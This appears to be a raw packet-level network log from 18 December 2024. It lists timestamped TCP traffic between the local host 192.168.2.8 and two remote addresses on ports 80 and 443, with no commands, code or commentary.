                                                                                                                                                                                          Dec 18, 2024 09:07:19.250873089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.250941038 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.408624887 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.408773899 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:19.409970999 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:19.410000086 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.411206961 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412230015 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412272930 CET49715443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412328005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412405968 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412463903 CET44349715104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412476063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412516117 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412564039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412631035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412664890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412679911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412679911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412714958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412724972 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.412781000 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.413433075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.413494110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.413573027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.413609028 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.413629055 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.413666010 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425329924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425386906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425403118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425424099 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425442934 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425472975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425544024 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425579071 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425606966 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425615072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425628901 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425671101 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425834894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425884962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425890923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425920010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425939083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425955057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.425975084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426012039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426012993 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426050901 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426071882 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426095009 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426340103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426373005 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426389933 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426418066 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426469088 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426520109 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426609039 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426644087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426666975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426677942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426687002 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426712990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426728964 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426749945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426765919 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426784992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426804066 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426819086 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426841974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426855087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426867962 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426892996 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426912069 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426928043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426935911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.426980972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427452087 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427488089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427530050 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427530050 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427541018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427576065 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427592993 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427612066 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427630901 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427648067 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427661896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427684069 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427700043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427719116 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427740097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427752972 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427759886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427788019 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427805901 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427822113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427834034 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.427875042 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428333998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428397894 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428422928 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428477049 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428493023 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428513050 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428535938 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428549051 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428556919 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428585052 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428596973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428632021 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428860903 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428895950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428917885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428941011 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428951025 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.428987026 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429003954 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429023027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429033995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429058075 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429073095 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429111958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429410934 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429465055 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429466009 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429503918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429517984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429558039 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429773092 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429827929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429846048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429881096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429898024 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.429922104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.430104971 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.430157900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.430159092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.430192947 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.430208921 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.430238008 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431119919 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431179047 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431242943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431277037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431296110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431334972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.431960106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432015896 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432034016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432070017 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432089090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432115078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432693958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432754993 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.432934999 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433036089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433037996 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433070898 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433089018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433118105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433765888 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433821917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433826923 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433857918 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433868885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.433906078 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.434587955 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.434647083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.434679031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.434714079 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.434734106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.434757948 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437593937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437654972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437664986 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437700987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437714100 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437753916 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437936068 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437971115 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.437994957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438008070 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438030005 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438045979 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438066006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438091040 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438158989 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438194036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438213110 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438244104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438321114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438373089 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438376904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438409090 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438430071 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438460112 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.438967943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439026117 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439053059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439086914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439110041 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439138889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439840078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439893961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439902067 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439929008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439949989 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.439985037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.440701962 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.440757990 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.440763950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.440793991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.440804958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.440850973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.441560984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.441632986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.441652060 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.441687107 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.441708088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.441746950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.442404032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.442471981 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603570938 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603688955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603699923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603792906 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603811979 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603840113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603856087 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603880882 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603909016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603914976 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603938103 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.603955984 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.604760885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.604815960 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.604816914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.604852915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.604867935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.604907036 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.605587959 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.605638027 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.605643034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.605678082 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.605691910 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.605765104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.606441975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.606496096 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.606498003 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.606529951 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.606544971 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.606575012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.607456923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.607511044 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.607517958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.607548952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.607563972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.607588053 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.608545065 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.608603001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.608642101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.608676910 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.608700037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.608726978 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.609500885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.609568119 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.609643936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.609679937 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.609694004 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.609729052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.610296965 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.610356092 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.610414982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.610452890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.610470057 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.610511065 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.611382008 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.611435890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.611460924 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.611495018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.611511946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.611536980 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612066031 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612118006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612121105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612155914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612170935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612200975 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612883091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612932920 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:19.612935066 CET804971431.41.244.11192.168.2.8
